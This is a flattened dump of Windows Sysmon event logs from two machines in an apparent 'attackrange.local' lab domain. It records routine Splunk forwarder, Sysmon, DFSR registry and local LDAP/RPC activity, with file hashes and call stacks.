08:08:52.607{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A567713657AF0B0A919EC06108EDA5D,SHA256=792332DE3602134B0BB7FA27FE724EE2A27CD0E9E44AE03BAE553D30EE5F6F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:52.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B0897710F547C037EC6A6CC187BCC54,SHA256=D6455F6FBA3143E1079528C816CA79A4E1791B27580B9A552399C253DCF04F82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F894-60EB-037E-00000000CF01}8604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:52.290{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:52.290{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F894-60EB-037E-00000000CF01}8604C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.290{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F894-60EB-037E-00000000CF01}8604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:52.285{466BC892-F894-60EB-037E-00000000CF01}8604C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.970{466BC892-F895-60EB-057E-00000000CF01}42529372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.970{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8E3E851C2F4B9B9A7217B49404019E1,SHA256=07CF0D12A2D73A08C297CF25B5A12B19A9D416F1295C265ADDE950B3056AE922,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:53.670{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F895-60EB-057E-00000000CF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:53.670{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:53.670{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F895-60EB-057E-00000000CF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F895-60EB-057E-00000000CF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.655{466BC892-F895-60EB-057E-00000000CF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.623{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF16819A5F400BCAE906CAA40A435A37,SHA256=58BF1B3C4519BD7CDB6E41A15DF8B95E6C4AAC22BE8536AF8792A4CDCC6D7744,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:53.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C91CB36329154C9B36939BB43A73A1BE,SHA256=69A468DD33F00EAAF6D13508B5DFA51DF6446AAC3068D519016E27D7111AD1E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.269{466BC892-F894-60EB-047E-00000000CF01}8412840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001055079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:53.107{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001055078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:53.107{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication 
Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001055077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:53.107{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 23542300x8000000000000000810587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:54.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=195533F5E1710FCD2CC3A04058B4CC72,SHA256=112CC168426B11F714BD3F4F3359E2D3431B41EE37D3557A3238D682E9134F8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.653{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61985-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.652{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61985-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61984-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.639{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61984-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.611{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61983-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001055101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.611{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61983-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 23542300x80000000000000001055100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.623{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35298C34B0A32006C49194F50F0F71BC,SHA256=219A6AD6D32BD5A005DA71F4B1DDA0E91FA726BD65E821F9471DB6FC31B76257,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:54.191{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F896-60EB-067E-00000000CF01}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:54.191{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 